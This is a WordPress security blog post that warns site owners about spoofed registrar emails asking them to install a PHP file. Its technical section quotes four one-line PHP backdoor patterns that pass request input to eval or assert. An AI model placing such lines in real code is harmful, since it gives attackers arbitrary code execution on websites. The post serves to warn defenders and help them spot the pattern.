WordPress Security
WordPress Security
Posted By Gregory

Do not trust those fake domain confirmation emails

If you ever receive a letter any kind that requests to create, download or install some PHP code on your website you must ignore it


Recently some of my clients received strange email letters from their domain registrars. Those letters contain a request for confirmation domains their own. I checked one of those letters and quickly identified it as a fraudulent letter. All the letters have an identical pattern and a request to create a PHP file in the root folder on a website with a specific name and the given content. Needless to say that suggested content for that PHP file contains malicious code known as backdoor code. This kind of code allows the attacker to execute any action they want on a victim’s website.

If you ever receive a letter any kind that requests to create, download or install some PHP code on your website you must ignore it. No exceptions. Even if the letter comes from the president or your mom.

Fraudulent letters appear legitimate because of legitimate From email address. But it is an email spoofing. You don’t expect to receive a fake email from your friends or your domain registrar. Right? No! Any email letter can contain any From email address. The vast majority of email servers and email clients do not check or verify the sender address. So, you see it as a hacker wanted. You must not trust any email letter you’ve received from known sender if the letter contains a request for some suspicious action like installing code on your website or application on your computer.

Technical details

Fake emails usually contain some of the following PHP lines.

assert(stripslashes($_REQUEST['something']));

eval(stripslashes($_REQUEST['something']));

assert(base64_decode($_REQUEST['something']));

eval(base64_decode($_REQUEST['something']));

FYI: base64_decode, eval and assert are well-known markers of suspicious or malicious PHP code.

See also: Plugin Inspector reveals security issues with other plugins

Have any questions?

If you have a question regarding WordPress security or WP Cerber, leave them in the comments section below or get them answered on the community forum.

Spotted a bug or glitch?

We’d love to fix it! Share your bug discoveries with us here: Bug Report.


I'm a software engineer and team lead at Cerber Tech. I started coding in 1993 on IBM System/370 and today software engineering at Cerber Tech is how I make my living.

View Comments
There are currently no comments.